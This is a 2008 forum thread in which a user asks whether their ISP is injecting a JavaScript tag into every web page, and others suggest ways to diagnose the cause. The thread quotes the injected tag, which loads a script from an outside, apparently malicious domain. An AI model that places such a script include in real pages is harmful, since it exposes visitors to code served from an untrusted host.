Page 1 of 8

Is my ISP injecting JS line ?

Posted: Tue Jan 01, 2008 11:03 pm
by anjanesh
Hi

I got a situation.
Whenever I browse the net, I get the following line injected at the top of the HTML page.

Code: Select all

<SCRIPT LANGUAGE="javascript1.2" SRC="http://x.222360.com/un.js"></SCRIPT>
If its not x.222360, its s.222360 etc. (I've added these to my hosts file)

I formatted my hard-disk, re-installed my OS and it still persists.

I tried a small php code to get the html contents using file_get_contents.

Code: Select all

php file_get_contents.php > temp.txt
Guess what ? That Javascript line still exists !

What I would like to know is, is this 100% confirmation that this issue is from my ISP's side & not from my PC ?

I understand if all my browsers (FF 2.0.0.11, IE7, Safari 3.0.4, Opea 9.5 beta) are hikacked (Im never in admin mode anyway, only User), but a php code retrieving the contents ... I dont think php.exe got hijacked.

Worse part is, it doesnt happen 100% of the time - say 65% - 85%.

Thanks

Posted: Tue Jan 01, 2008 11:10 pm
by John Cartwright
Whoa! My first instinct would be that your computer has been compromised although you did reformat your computer... this is just scary stuff. Visiting the domain name http://222360.com/ it is a domain squatter page. A quick whois reveals not much information other than it is somebody trying to mask their identity.

Code: Select all

Domain name: 222360.com

Registrant Contact:
sdfads sdfa
asdf asdf (manage@222360.com)
+682.8888888888
Fax: +420.8888888888
asdf
asdf, HONGKONG 100000
CN

Administrative Contact:
sdfads sdfa
asdf asdf (manage@222360.com)
+682.8888888888
Fax: +420.8888888888
asdf
asdf, HONGKONG 100000
CN

Technical Contact:
sdfads sdfa
asdf asdf (manage@222360.com)
+682.8888888888
Fax: +420.8888888888
asdf
asdf, HONGKONG 100000
CN

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-se
Very scary indeed.

Posted: Tue Jan 01, 2008 11:19 pm
by Benjamin
The js seems to be obfuscated as well. Quick test - boot from an ubuntu live cd or clean linux install and see if the problem is still there.

Posted: Tue Jan 01, 2008 11:48 pm
by anjanesh
I dont want to install linux on my Windows PC.

Code: Select all

<?php
$url = "http://forums.devnetwork.net";
$c = file_get_contents($url);
echo $c;
?>
What I would like to know is, how can the above code have the injected JS line if its my PC thats infected ?

Posted: Tue Jan 01, 2008 11:50 pm
by John Cartwright
anjanesh wrote:I dont want to install linux on my Windows PC.

Code: Select all

<?php
$url = "http://forums.devnetwork.net";
$c = file_get_contents($url);
echo $c;
?>
What I would like to know is, how can the above code have the injected JS line if its my PC thats infected ?
You don't need to install it to run it -- hence Ubuntu Live CD

Posted: Tue Jan 01, 2008 11:58 pm
by RobertGonzalez
The live Ubuntu CD means that you can boot from it, run it, use it and then turn it off. It can even allow you to see your files on your Windows partition if you want.

Posted: Wed Jan 02, 2008 12:26 am
by anjanesh
Where do the temporary files get stored when booting from Ubuntu Live ?
I have a 40GB NTFS hard-disk that has my WinXP OS and software Another 250GB NTFS for my data.

Posted: Wed Jan 02, 2008 12:46 am
by RobertGonzalez
Everything lives in RAM. There is no writing to disk. Seriously, there is nothing to worry about. I do it all the time just to play with it.

Posted: Wed Jan 02, 2008 12:57 am
by anjanesh
I surely will download and give it a try. Need to download.

But coming back to the original question ...
how is it possible for that php snippet to get that JS line injected into the html page ?

Posted: Wed Jan 02, 2008 1:04 am
by Kieran Huggins
Are you sure it's not a browser thing? Maybe an extension? If you backed up your firefox profile (like I would) then the extension would have survived the format.

Posted: Wed Jan 02, 2008 1:15 am
by Benjamin
I would venture to guess that it's either your ISP, a rogue employee working at the ISP, or someone is hacking your ISP's routers. Especially considering that you reinstalled Windows. Did you reinstall from an original MS or OEM CD?

Posted: Wed Jan 02, 2008 1:16 am
by anjanesh
I reintalled my OS and installed FF - with 0 extensions. I was hoping to solve this first and then install the extensions.

Btw, I ran the php code via command-line - not via the browser.

Code: Select all

php file_get_contents.php > output.txt
Did you reinstall from an original MS or OEM CD?
OEM OS - the one that came with my HP PC.

Posted: Wed Jan 02, 2008 1:21 am
by Benjamin
And you're connected directly to your router or cable modem? Hardwired or Wireless?

Posted: Fri Jan 04, 2008 10:52 am
by anjanesh
Hardwired. Using Sify.

I unnecessarily re-installed my system. Its been 3yrs since I've done a format + OS re-install since Im pretty secure on hijack related issues.

Anyway, this still is happening and its not something I can do much about - except block using AdBlock extension, adding entries in hosts file etc.

Apparently, this is a result of an attack on open ports and somehow manages to inject on the way (gateway) - definitely not happening on my PC.
(http://www.experts-exchange.com/Virus_a ... 49938.html)

Very often my net is slow probably because of this continuous attack.

Posted: Fri Jan 04, 2008 11:14 am
by Jenk
I've suffered similar in the past and all I could was inform my ISP and ask them to investigate.

The reason these attacks occur is usually one of two, DDoS, and to greatly increase the value of a domain (lots of hits.)